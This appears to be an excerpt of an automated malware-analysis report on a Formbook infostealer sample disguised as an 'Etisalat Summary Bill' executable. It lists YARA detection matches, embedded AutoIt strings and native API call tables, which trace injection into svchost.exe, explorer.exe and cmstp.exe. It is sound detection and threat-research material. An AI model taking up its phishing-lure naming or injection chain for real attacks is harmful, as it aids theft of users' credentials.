          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4443389899.0000000010977000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Details of Your Etisalat Summary Bill for the Month of May 2024.exe PID: 5772, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 4428, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmstp.exe PID: 1472, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Binary is likely a compiled AutoIt script file
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: This is a third-party compiled AutoIt script.0_2_00B63B4C
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5185667e-2
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_53c69fd1-9
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_992271cd-a
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_dad4de33-9
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: Details of Your Etisalat Summary Bill for the Month of May 2024.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A350 NtCreateFile,2_2_0041A350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A400 NtReadFile,2_2_0041A400
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A480 NtClose,2_2_0041A480
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A530 NtAllocateVirtualMemory,2_2_0041A530
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A47A NtClose,2_2_0041A47A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A52A NtAllocateVirtualMemory,2_2_0041A52A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_03072BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,LdrInitializeThunk,2_2_03072AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,LdrInitializeThunk,2_2_03072F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_03072F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,LdrInitializeThunk,2_2_03072FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,LdrInitializeThunk,2_2_03072FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_03072E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_03072EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,LdrInitializeThunk,2_2_03072D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_03072D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,LdrInitializeThunk,2_2_03072DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_03072CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,2_2_03072C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,2_2_030735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
          Source: C:\Windows\explorer.exeCode function: 3_2_10960E12 NtProtectVirtualMemory,3_2_10960E12
          Source: C:\Windows\explorer.exeCode function: 3_2_1095F232 NtCreateFile,3_2_1095F232
          Source: C:\Windows\explorer.exeCode function: 3_2_10960E0A NtProtectVirtualMemory,3_2_10960E0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04D72CA0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04D72C70
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72C60 NtCreateKey,LdrInitializeThunk,4_2_04D72C60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72DD0 NtDelayExecution,LdrInitializeThunk,4_2_04D72DD0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04D72DF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04D72D10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04D72EA0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72FE0 NtCreateFile,LdrInitializeThunk,4_2_04D72FE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72F30 NtCreateSection,LdrInitializeThunk,4_2_04D72F30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72AD0 NtReadFile,LdrInitializeThunk,4_2_04D72AD0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04D72BF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04D72BE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72B60 NtClose,LdrInitializeThunk,4_2_04D72B60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D735C0 NtCreateMutant,LdrInitializeThunk,4_2_04D735C0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D74650 NtSuspendThread,4_2_04D74650
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D74340 NtSetContextThread,4_2_04D74340
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72CC0 NtQueryVirtualMemory,4_2_04D72CC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72CF0 NtOpenProcess,4_2_04D72CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72C00 NtQueryInformationProcess,4_2_04D72C00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72DB0 NtEnumerateKey,4_2_04D72DB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72D00 NtSetInformationFile,4_2_04D72D00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72D30 NtUnmapViewOfSection,4_2_04D72D30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72EE0 NtQueueApcThread,4_2_04D72EE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72E80 NtReadVirtualMemory,4_2_04D72E80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72E30 NtWriteVirtualMemory,4_2_04D72E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72F90 NtProtectVirtualMemory,4_2_04D72F90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72FB0 NtResumeThread,4_2_04D72FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72FA0 NtQuerySection,4_2_04D72FA0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72F60 NtCreateProcessEx,4_2_04D72F60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72AF0 NtWriteFile,4_2_04D72AF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72AB0 NtWaitForSingleObject,4_2_04D72AB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72B80 NtQueryInformationFile,4_2_04D72B80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D72BA0 NtEnumerateValueKey,4_2_04D72BA0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D73090 NtSetValueKey,4_2_04D73090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D73010 NtOpenDirectoryObject,4_2_04D73010
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D73D70 NtOpenThread,4_2_04D73D70
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D73D10 NtOpenProcessToken,4_2_04D73D10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D739B0 NtGetContextThread,4_2_04D739B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5A350 NtCreateFile,4_2_02E5A350
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5A480 NtClose,4_2_02E5A480
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5A400 NtReadFile,4_2_02E5A400
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5A530 NtAllocateVirtualMemory,4_2_02E5A530
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5A47A NtClose,4_2_02E5A47A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5A52A NtAllocateVirtualMemory,4_2_02E5A52A
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BC40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00BC40B1
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BB8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00BB8858
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BC545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00BC545F
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B6E8000_2_00B6E800
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B8DBB50_2_00B8DBB5
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B6E0600_2_00B6E060
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BE804A0_2_00BE804A
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B741400_2_00B74140
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B824050_2_00B82405
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B965220_2_00B96522
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B9267E0_2_00B9267E
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BE06650_2_00BE0665
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B8283A0_2_00B8283A
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B768430_2_00B76843
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B989DF0_2_00B989DF
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B96A940_2_00B96A94
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BE0AE20_2_00BE0AE2
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B78A0E0_2_00B78A0E
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BC8B130_2_00BC8B13
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BBEB070_2_00BBEB07
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B8CD610_2_00B8CD61
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B970060_2_00B97006
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B731900_2_00B73190
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B7710E0_2_00B7710E
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B612870_2_00B61287
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B833C70_2_00B833C7
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B8F4190_2_00B8F419
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B756800_2_00B75680
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B816C40_2_00B816C4
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B878D30_2_00B878D3
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B758C00_2_00B758C0
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B81BB80_2_00B81BB8
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B99D050_2_00B99D05
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B6FE400_2_00B6FE40
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B8BFE60_2_00B8BFE6
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B81FD00_2_00B81FD0
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_015E36700_2_015E3670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D9DB2_2_0041D9DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E1AE2_2_0041E1AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DC282_2_0041DC28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DD912_2_0041DD91
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D5962_2_0041D596
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DDB92_2_0041DDB9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DF472_2_0041DF47
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F41A22_2_030F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D20002_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E44202_2_030E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E2F302_2_030E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DCD1F2_2_030DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
